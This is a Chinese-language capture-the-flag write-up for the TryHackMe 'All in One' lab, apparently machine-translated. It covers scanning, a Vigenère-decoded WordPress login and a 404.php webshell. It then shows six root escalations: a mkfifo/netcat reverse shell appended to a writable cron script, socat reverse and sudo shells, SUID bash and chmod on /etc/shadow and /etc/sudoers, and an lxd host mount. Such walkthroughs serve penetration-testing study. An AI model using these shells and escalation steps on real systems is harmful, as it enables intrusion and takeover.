关于安全:TryhackmeAll-in-OneVinegar加密多种提权方法

56次阅读

共计 14757 个字符,预计需要花费 37 分钟才能阅读完成。

服务发现

┌──(root💀kali)-[~/tryhackme/allinone]
└─# nmap -sV -Pn 10.10.167.81     
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-28 05:58 EDT
Nmap scan report for 10.10.167.81
Host is up (0.31s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.24 seconds

ftp 服务枚举

ftp 能够匿名登录
无任何文件发现
也不可以上传文件到 ftp
用其余用户名登录 ftp 会提醒This FTP server is anonymous only.

爆破目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.167.81                

 _|. _ _  _  _  _ _|_    v0.3.8                                                                                                                                                                                                             
(_||| _) (/_(_|| (_|)                                                                                                                                                                                                                      
                                                                                                                                                                                                                                            
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-28_05-59-27.log

Target: http://10.10.167.81                                                                                                                                                                                                                 
                                                                                                                                                                                                                                            
[05:59:28] Starting: 
[05:59:32] 200 -   11KB - /           
[05:59:36] 301 -  316B  - /wordpress  ->  http://10.10.167.81/wordpress/
[05:59:57] 200 -  197B  - /hackathons           
[06:05:57] 403 -  277B  - /server-status                                                                            
                                                                                                                                                                                                
Task Completed     

http://10.10.167.81/wordpress/是一个 wordpress 站点

wordpress 开掘

┌──(root💀kali)-[~/tryhackme/allinone]
└─# wpscan --url http://10.10.167.81/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://10.10.167.81/wordpress/ [10.10.167.81]
[+] Started: Tue Sep 28 06:20:29 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.167.81/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.167.81/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.167.81/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.167.81/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.167.81/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.167.81/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.167.81/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.167.81/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:09 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:09

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Sep 28 06:20:42 2021
[+] Requests Done: 139
[+] Cached Requests: 40
[+] Data Sent: 37.39 KB
[+] Data Received: 19.909 KB
[+] Memory used: 213.031 MB

首页呈现一个账号信息:elyana。经登陆测试验证是非法账号。确认 wordpress 版本 5.5.1

爆破 wordpress 站点目录

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.167.81/wordpress

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-29_01-44-29.log

Target: http://10.10.167.81/wordpress

[01:44:30] Starting: 
[01:44:35] 301 -  327B  - /wordpress/wp-content  ->  http://10.10.167.81/wordpress/wp-content/
[01:44:39] 301 -  328B  - /wordpress/wp-includes  ->  http://10.10.167.81/wordpress/wp-includes/
[01:44:39] 200 -   28KB - /wordpress/  
[01:45:02] 301 -  325B  - /wordpress/wp-admin  ->  http://10.10.167.81/wordpress/wp-admin/
                                                                                                                                                                                                
Task Completed

wp-includes 能够看到文件 list

爆破 /hackathons,无发现

http://10.10.167.81/hackathons里显示了一句话

Damn how much I hate the smell of Vinegar :/ !!!

源代码有两行正文

Dvc W@iyur@123 
KeepGoing 

Vinegar 是一种加密算法, 中文名叫 维吉尼亚明码, 以下援用自维基百科

维吉尼亚明码是应用一系列凯撒明码组成明码字母表的加密算法,属于多表明码的一种简略模式。维吉尼亚明码曾多次被创造。该办法最早记录在吉奥万·巴蒂斯塔·贝拉索于 1553 年所著的书《吉奥万·巴蒂斯塔·贝拉索学生的明码》中。然而,起初在 19 世纪时被误传为是法国外交官布莱斯·德·维吉尼亚所发明,因而当初被称为“维吉尼亚明码”

应用这个网站
Dvc W@iyur@123 是明码串
KeepGoing 是加解密的 key
解密当前的明文是:Try H@ckme@123

elyana : H@ckme@123 登录 wordpress 后盾

theme editer 里找到 404.php,把 webshell 写到模板里,拜访一个不存在的页面,触发发弹 shell

──(root💀kali)-[~/tryhackme/allinone]
└─# nc -lnvp 1234                       
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.167.81] 59420
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:44:14 up  2:10,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home
$ ls
elyana
$ cd elyana
$ ls -alh
total 48K
drwxr-xr-x 6 elyana elyana 4.0K Oct  7  2020 .
drwxr-xr-x 3 root   root   4.0K Oct  5  2020 ..
-rw------- 1 elyana elyana 1.6K Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3.7K Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4.0K Oct  5  2020 .cache
drwxr-x--- 3 root   root   4.0K Oct  5  2020 .config
drwx------ 3 elyana elyana 4.0K Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4.0K Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)
$ 

没有权限拜访 user.txt,必须横向提权到 elyana 的账号

传 linpeas 到靶机,发现一个 root 的定时工作有可写权限,能够间接跳过横向提权到 root,另外还有几个提权办法,这里一一介绍

提权办法 1:Cron

思路是把一个反弹 shell 写到 cron 工作里,开启监听期待工作执行
须要留神这台靶机很多反弹办法都不能应用,须要一一测试
这里用的是 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f
参考这里的办法

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" >> /var/backups/script.sh
$ cat /var/backups/script.sh
#!/bin/bash

#Just a test script, might use it later to for a cron task 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f
$ 

开启监听,拿到 user 和 root 的 flag, 须要 base64 解密

┌──(root💀kali)-[~/dirsearch]
└─# nc -lnvp 4242                                                                                                                                                                                                                       1 ⨯
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.167.81] 48544
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /home/elyana/user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
# cat /root/root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
# 

提权办法 2 sudo 滥用:socat

因为这台机器只装置了 python3,所以咱们要用 python3 切换 tty

python3 -c "import pty;pty.spawn('/bin/bash')"

用 find 找到 elyana 相干的文件

bash-4.4$  find / -user elyana -type f 2>/dev/null
 find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

找到 ssh 凭证:elyana:E@syR18ght

咱们登陆到 elyana 的账号,查看 elyana 的 sudo 权限

┌──(root💀kali)-[~]
└─# ssh elyana@10.10.167.81
elyana@10.10.167.81's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

16 packages can be updated.
0 updates are security updates.


Last login: Fri Oct  9 08:09:56 2020
-bash-4.4$ whoami
elyana
-bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

提权

-bash-4.4$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

咱们查看 linpease 枚举的本机的所有 SUID, 很多都是能够拿来提权的

-rwsr-xr-x 1 root root 43K Sep 16  2020 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                     
-rwsr-xr-x 1 root root 63K Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 31K Aug 11  2016 /bin/fusermount (Unknown SUID binary)
-rwsr-xr-x 1 root root 44K Mar 22  2019 /bin/su
-rwsr-sr-x 1 root root 1.1M Jun  6  2019 /bin/bash
-rwsr-sr-x 1 root root 59K Jan 18  2018 /bin/chmod
-rwsr-xr-x 1 root root 27K Sep 16  2020 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-- 1 root messagebus 42K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 427K Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary)
-rwsr-xr-x 1 root root 99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 111K Jul 10  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 14K Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 37K Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22K Mar 27  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-sr-x 1 root root 11M Nov 23  2018 /usr/bin/lxc (Unknown SUID binary)
-rwsr-xr-x 1 root root 19K Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37K Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Mar 22  2019 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /usr/bin/chsh (Unknown SUID binary)
-rwsr-xr-x 1 root root 40K Mar 22  2019 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 146K Jan 31  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 root root 392K Apr  4  2018 /usr/bin/socat
-rwsr-xr-x 1 root root 75K Mar 22  2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 59K Mar 22  2019 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)

提权办法 3 SUID:socat

socat 同时也是一个 SUID, 咱们根据 SUID 提权

在攻击机开启监听:
socat file:`tty`,raw,echo=0 tcp-listen:12345

在靶机执行:
sudo /usr/bin/socat tcp-connect:10.13.21.169:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane

返回 root 的反弹 shell

┌──(root💀kali)-[~]
└─# socat file:`tty`,raw,echo=0 tcp-listen:12345
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# 

提权办法 4 SUID:bash

-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(elyana) gid=1000(elyana) euid=0(root) egid=0(root) groups=0(root),4(adm),27(sudo),108(lxd),1000(elyana)
bash-4.4# whoami
root
bash-4.4# 

提权办法 5 SUID:chmod

这个命令的思路是通过 chmod 批改一些敏感文件的权限,使得这些文件可读可写,从而晋升本人的权限

-bash-4.4$ ls -alh /etc/sudoers
-r--r----- 1 root root 772 Oct  6  2020 /etc/sudoers
-bash-4.4$ /bin/chmod 777 /etc/sudoers
-bash-4.4$ ls -alh /etc/sudoers
-rwxrwxrwx 1 root root 772 Oct  6  2020 /etc/sudoers
-bash-4.4$ /bin/chmod 777 /etc/shadow
-bash-4.4$ ls -alh /etc/shadow
-rwxrwxrwx 1 root shadow 981 Oct  6  2020 /etc/shadow

提权办法 6 lxd 组用户提权

这个办法的操作流程在之前我的这台靶机里有具体记录

bash-4.4$ wget http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
--2021-09-29 09:42:52--  http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
Connecting to 10.13.21.169:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2684439 (2.6M) [application/gzip]
Saving to:‘alpine-v3.8-i686-20210926_2341.tar.gz’alpine-v3.8-i686-20210926_2341.tar.gz                      100%[========================================================================================================================================>]   2.56M   722KB/s    in 3.6s    

2021-09-29 09:42:56 (722 KB/s) -‘alpine-v3.8-i686-20210926_2341.tar.gz’saved [2684439/2684439]

bash-4.4$ ls
alpine-v3.8-i686-20210926_2341.tar.gz  p.txt                                                                    systemd-private-cdd8179bf3ba4745b2f268da926b2a33-systemd-resolved.service-qOqtw7
f                                      systemd-private-cdd8179bf3ba4745b2f268da926b2a33-apache2.service-qmXFBf  systemd-private-cdd8179bf3ba4745b2f268da926b2a33-systemd-timesyncd.service-PIgav5
bash-4.4$ lxc image import ./alpine-v3.8-i686-20210926_2341.tar.gz --alias myimage
Image imported with fingerprint: a4b76201ae71d9a5e56acf1263f61546a77a4086779729bb254d47cd24cb6829
bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite
bash-4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
bash-4.4$  lxc start ignite
bash-4.4$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/
/mnt/root # ls
bin             cdrom           etc             initrd.img      lib             lost+found      mnt             proc            run             snap            sys             usr             vmlinuz
boot            dev             home            initrd.img.old  lib64           media           opt             root            sbin            srv             tmp             var             vmlinuz.old
/mnt/root # cd root/
/mnt/root/root # pwd
/mnt/root/root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
/mnt/root/root # 

这里列出了 6 种提权的办法,但我感觉应该还有其余办法,这里就不再测试了。如果你晓得其余提权的思路,请留言通知我:)

正文完
 0